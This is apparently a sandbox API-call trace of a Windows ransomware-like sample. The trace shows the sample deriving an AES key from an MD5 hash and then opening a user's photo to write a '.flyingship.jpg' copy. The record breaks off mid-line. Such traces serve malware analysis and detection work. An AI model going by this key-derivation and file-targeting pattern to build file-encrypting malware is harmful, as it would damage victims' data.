[0190.844] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.844] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.844] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.845] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0190.845] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.845] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0190.845] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.845] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.845] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0190.845] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.845] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.845] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.845] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.845] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.845] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0190.845] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.845] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0190.847] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.847] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.847] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0190.847] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.847] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.847] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.847] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.847] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.847] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.847] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.847] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.847] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.847] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.847] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.848] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.848] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0190.848] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.848] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.848] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.848] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.848] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.848] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.848] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.848] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.848] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.848] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.848] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.848] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.848] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.848] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.849] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.849] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.849] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.849] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0190.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.849] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0190.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.849] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.849] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.849] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.849] CryptHashData (hHash=0x90af58, pbData=0x8dec68, dwDataLen=0x19, dwFlags=0x1) returned 1 [0190.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.850] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.850] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.850] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.859] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.860] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.860] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0190.860] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.860] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.860] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.860] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.860] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.860] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.860] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0190.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.860] CryptDestroyHash (hHash=0x90af58) returned 1 [0190.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0190.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0190.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0190.861] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0190.861] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.861] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.861] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.861] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0190.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.861] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\tim2ia.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.862] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.862] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0190.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0190.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.863] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0190.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0190.863] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0190.863] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0190.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0190.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0190.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0190.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0190.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0190.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0190.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0190.864] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh")) returned 0x10 [0190.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0190.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0190.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0190.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0190.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0190.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0190.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0190.866] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.flyingship.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\tim2ia.flyingship.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0190.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0190.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0190.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.867] PeekMessageW (in: 